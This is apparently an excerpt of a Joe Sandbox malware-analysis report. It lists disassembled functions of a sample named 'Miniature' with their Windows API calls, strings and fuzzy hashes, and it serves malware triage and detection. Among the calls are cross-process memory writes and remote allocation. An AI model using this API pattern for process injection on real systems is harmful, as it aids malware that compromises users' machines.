                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: be5bcbf9e1f28c60cf167844daec3c8a318b79209a2e40c9c5a078ee94dbb19c
                                                  • Instruction ID: 353070919dfffaf78eb5700663f19492d6bc7242e7a41f81a4fd47c4c58372d6
                                                  • Opcode Fuzzy Hash: be5bcbf9e1f28c60cf167844daec3c8a318b79209a2e40c9c5a078ee94dbb19c
                                                  • Instruction Fuzzy Hash: 86A13DB1104205AFE700EF64CC81EABB7E8FF95718F00491DF59597192EB74EA0ADB92
                                                  APIs
                                                    • Part of subcall function 00FB0FE6: std::exception::exception.LIBCMT ref: 00FB101C
                                                    • Part of subcall function 00FB0FE6: __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 00FA1680: _memmove.LIBCMT ref: 00FA16DB
                                                  • __swprintf.LIBCMT ref: 00F9E598
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F9E431
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: 333f7c6e647b9d73ea552ef9427a2a72976be1ae2cb7544e550036c4f8ec9b3c
                                                  • Instruction ID: 280bfeb34377a74c0e0ffb8a9507dfaad9b1e6ae3b29afc9da40668806f066c3
                                                  • Opcode Fuzzy Hash: 333f7c6e647b9d73ea552ef9427a2a72976be1ae2cb7544e550036c4f8ec9b3c
                                                  • Instruction Fuzzy Hash: 4B91BE715082019FDB14EF24CC95C6FB7A8FF96710F45491EF486972A1EB24ED04EB92
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00FB52CD
                                                    • Part of subcall function 00FC0320: __87except.LIBCMT ref: 00FC035B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: a696a5794661c18963be0e81a94dbc36dd94e359f6a885ddf17aeeb6cf33c3a8
                                                  • Instruction ID: 93c956264aeaba2142272428ae0d18d3ff55e962fa9e9f86f4785e064ea8bfb4
                                                  • Opcode Fuzzy Hash: a696a5794661c18963be0e81a94dbc36dd94e359f6a885ddf17aeeb6cf33c3a8
                                                  • Instruction Fuzzy Hash: 06517F31E09607C6CB25BA15CA02BAB37D09B00B60F34892DE1C1462D9EF7D8CC5BF41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$+
                                                  • API String ID: 0-2552117581
                                                  • Opcode ID: a9a375de72f467b565de2cda09d1135a03722c235b7b32cac2b1837cb3ee8ac9
                                                  • Instruction ID: 3b57659add8e6d4bc50b81b8ccebd3aeac1f0f8da3d817796418e02e798bd890
                                                  • Opcode Fuzzy Hash: a9a375de72f467b565de2cda09d1135a03722c235b7b32cac2b1837cb3ee8ac9
                                                  • Instruction Fuzzy Hash: 8E511575900299CFDF25DF6AC844AFA7BA4FF65320F244055F891DB290DB34AE42EB60
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: cacaffc306af6e6e466470de5342d31b4d7f2d9e2d8cb8a473018e50974ed382
                                                  • Instruction ID: bd6358e841c2af813401ec36389ada0404e07f840dcea068cad6205f10ffd26f
                                                  • Opcode Fuzzy Hash: cacaffc306af6e6e466470de5342d31b4d7f2d9e2d8cb8a473018e50974ed382
                                                  • Instruction Fuzzy Hash: 2D51C1B2D007059FDB24DF65C881BAABBF4FF05324F24856EE44ACB250E7349585DB90
                                                  APIs
                                                    • Part of subcall function 00FF1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FE9E4E,?,?,00000034,00000800,?,00000034), ref: 00FF1CE5
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FEA3F7
                                                    • Part of subcall function 00FF1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FE9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00FF1CB0
                                                    • Part of subcall function 00FF1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00FF1C08
                                                    • Part of subcall function 00FF1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FE9E12,00000034,?,?,00001004,00000000,00000000), ref: 00FF1C18
                                                    • Part of subcall function 00FF1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FE9E12,00000034,?,?,00001004,00000000,00000000), ref: 00FF1C2E
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FEA464
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FEA4B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: 5ce7d4a9dc2f71b063e2018bce01766c4fae7f2c09f5b0a8bbe1a97a2ba91c72
                                                  • Instruction ID: b65a0a1bf116c0ee6d5bc68d2f177adbf277f5c73c6c73d1528828ff09ace938
                                                  • Opcode Fuzzy Hash: 5ce7d4a9dc2f71b063e2018bce01766c4fae7f2c09f5b0a8bbe1a97a2ba91c72
                                                  • Instruction Fuzzy Hash: C5415D7290021CBFCB20DFA4CC85AEEB7B8EF49310F104095FA55B7190DA756E45DBA1
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01017A86
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01017A9A
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 01017ABE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: b82bbe26a1fe8beaaf521a29cb5bdf437353630ea31b55e6f2e5983c2069f93b
                                                  • Instruction ID: 4ee6d674775f6eb8a33ad50ed416e69a32638bd824bc5c0e5c5a93ff7d7b885a
                                                  • Opcode Fuzzy Hash: b82bbe26a1fe8beaaf521a29cb5bdf437353630ea31b55e6f2e5983c2069f93b
                                                  • Instruction Fuzzy Hash: 5621D333640218BFDF258E94CC42FEA3BA9EF88714F110154FE546B195DA79A950DB90
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0101826F
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0101827D
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01018284
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: 499f17c2a4613a6c253545fd7206485f616cc56c440d5d852b0f5d084e5ce78b
                                                  • Instruction ID: 5ef2f92bb35398151cd56903f3d5be2a5748a2aa2fea1238230be90821bb0447
                                                  • Opcode Fuzzy Hash: 499f17c2a4613a6c253545fd7206485f616cc56c440d5d852b0f5d084e5ce78b
                                                  • Instruction Fuzzy Hash: 0221AEB5600209AFEB61DF58CC81DB737EDEB4A354B044099FA409B356CB35EC11DBA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01017360
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01017370
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01017395
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: 433521fb1587a466362338f7633c587c82d78121971930bb3a4d54225fb4bcbb
                                                  • Instruction ID: b27deb8fe012932a1d0e240e0c341d4918c388dd593036886e25ba9134f5925d
                                                  • Opcode Fuzzy Hash: 433521fb1587a466362338f7633c587c82d78121971930bb3a4d54225fb4bcbb
                                                  • Instruction Fuzzy Hash: 7121F232600208BFEF228F58CC85EBF37AAEB89750F10C124FA809B194C6759C518BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01017D97
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01017DAC
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01017DB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: 3ec401d200243d33401f2b129924fbedca748a2ccc472c8889df444ef5b574e0
                                                  • Instruction ID: 4187b25a0c92ec8b8ba7e70ca1303df87d3991debc34bb8251f51cdd0131685a
                                                  • Opcode Fuzzy Hash: 3ec401d200243d33401f2b129924fbedca748a2ccc472c8889df444ef5b574e0
                                                  • Instruction Fuzzy Hash: 8111E37224020CBBEF25AE64CC45FEB7BA9EF89B14F11411CFA81A6091D676A451DB20
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00FD027A,?), ref: 0100C6E7
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100C6F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                  • API String ID: 2574300362-1816364905
                                                  • Opcode ID: 8a4c36568863957040c038beac1806f97c1e6bc8e47e0dbbbd053e444ffcfb24
                                                  • Instruction ID: 8279968d91017f680569043b6c2fdfad66cd48ec32aaa4f4bbec57db795b2a0e
                                                  • Opcode Fuzzy Hash: 8a4c36568863957040c038beac1806f97c1e6bc8e47e0dbbbd053e444ffcfb24
                                                  • Instruction Fuzzy Hash: 00E08C78200312CBF7324E2AC949A4276D4BB04704F7084ADE8C9C2245D774C440CB10
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4AF7,?), ref: 00FA4BB8
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4BCA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 35a84e6650352621d0f219dbddefa3f06d1349e887702f9e03a7debbe27e7f42
                                                  • Instruction ID: 01d777195219ed32584384c2437f45e3ee34d4b1b3743dbd6781c9e8a6b70b37
                                                  • Opcode Fuzzy Hash: 35a84e6650352621d0f219dbddefa3f06d1349e887702f9e03a7debbe27e7f42
                                                  • Instruction Fuzzy Hash: 98D012B0910712CFD7305F31D84870676D5AF45391B219C6EE4C6D6548DBB4D480C710
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4B44,?,00FA49D4,?,?,00FA27AF,?,00000001), ref: 00FA4B85
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4B97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: dc6d9e1592ab0120304788bfa51b972fc9569d9f8eda54bcdc5b37c6ef618549
                                                  • Instruction ID: ea3efd6a9ff077dfc31477240695f82bcc5e6347bcfc6a5e0187b220bf17c28b
                                                  • Opcode Fuzzy Hash: dc6d9e1592ab0120304788bfa51b972fc9569d9f8eda54bcdc5b37c6ef618549
                                                  • Instruction Fuzzy Hash: C6D012B0910712CFD7305F31D85870676D4AF45391F21883DE4C6D6508D7B4E480D720
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA5E3D), ref: 00FA55FE
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA5610
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: ba4caac40a98666b741dff5b35da887a571ec1379a1ef4d85c2a2e4c0cc6bf8b
                                                  • Instruction ID: 9be7988cda7acc96120044ece6f54754a50a527b5ef77b78c6c4dfed1182e3d7
                                                  • Opcode Fuzzy Hash: ba4caac40a98666b741dff5b35da887a571ec1379a1ef4d85c2a2e4c0cc6bf8b
                                                  • Instruction Fuzzy Hash: 17D017B4A20B22CFEB309F32C80861676E4AF09765B21882EE4C6D6648E674C880CB50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,01011696), ref: 01011455
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01011467
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: 27ee20b16382c0c247a252b7699dcb19d13446359c8c9d91f8dc492d3c3a07d7
                                                  • Instruction ID: 2beb7567aaf586bd4ec44af0b04c2856fe7efc8d9e425916b0285edfcc4fa7c9
                                                  • Opcode Fuzzy Hash: 27ee20b16382c0c247a252b7699dcb19d13446359c8c9d91f8dc492d3c3a07d7
                                                  • Instruction Fuzzy Hash: E8D0C770642312CFE3308F3AC94820276E4AF06681B20C83EE5D6D6158EBB8D0C0CB00
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,010093DE,?,01020980), ref: 010097D8
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 010097EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 26ac1f3ee4936f428add7ce6cdd4f7ba9b808cf4dbb2c5e66248383065af0113
                                                  • Instruction ID: 45e297ad7316d80eac49150e2a2b49d2cd2a20f2d1e2115377f92c6ca04b9b79
                                                  • Opcode Fuzzy Hash: 26ac1f3ee4936f428add7ce6cdd4f7ba9b808cf4dbb2c5e66248383065af0113
                                                  • Instruction Fuzzy Hash: A2D01771A10727CFE7319F36D898606B6E4BF08395F21887EE4CAE6148EA74C480CB11
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e67de3056f7a4bc10f825e1d3ebd21fcbe454fcd72a533f9c05d9df925f8870a
                                                  • Instruction ID: c9d72b0f8a997a3d5087378d5d54462d8c0f1ad37681c0a3e2a9f69dd1207fc4
                                                  • Opcode Fuzzy Hash: e67de3056f7a4bc10f825e1d3ebd21fcbe454fcd72a533f9c05d9df925f8870a
                                                  • Instruction Fuzzy Hash: 5CC19075A00256EFCB14DF95C884EAEF7B5FF48710B208598E90ADB251DB31ED81DB90
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 0100E7A7
                                                  • CharLowerBuffW.USER32(?,?), ref: 0100E7EA
